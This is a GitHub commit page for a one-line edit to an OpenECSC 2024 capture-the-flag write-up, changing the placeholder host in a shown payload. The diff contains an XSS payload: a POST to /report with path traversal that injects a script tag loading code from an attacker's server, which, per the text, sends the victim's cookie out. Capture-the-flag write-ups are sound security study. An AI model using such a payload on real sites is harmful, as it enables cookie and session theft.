Skip to content

Commit

Permalink
Update round1.md
Browse files Browse the repository at this point in the history
  • Loading branch information
54toshi authored May 17, 2024
1 parent 003ff6a commit 83a6fad
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion 2024_OpenECSC/round1.md
Original file line number Diff line number Diff line change
Expand Up @@ -95,7 +95,7 @@ Then the payload loads a script from the attackers server, which sends the cooki
#### Payload
```http
POST /report?q=/admin HTTP/1.1
id=3../../../search?q=<script%20src="http://your-server.com"></script>&message=as/admin
id=3../../../search?q=<script%20src="http://<attackers_server>"></script>&message=as/admin
```
#### Payload Script on Attackers Server
```javascript
Expand Down

0 comments on commit 83a6fad

Please sign in to comment.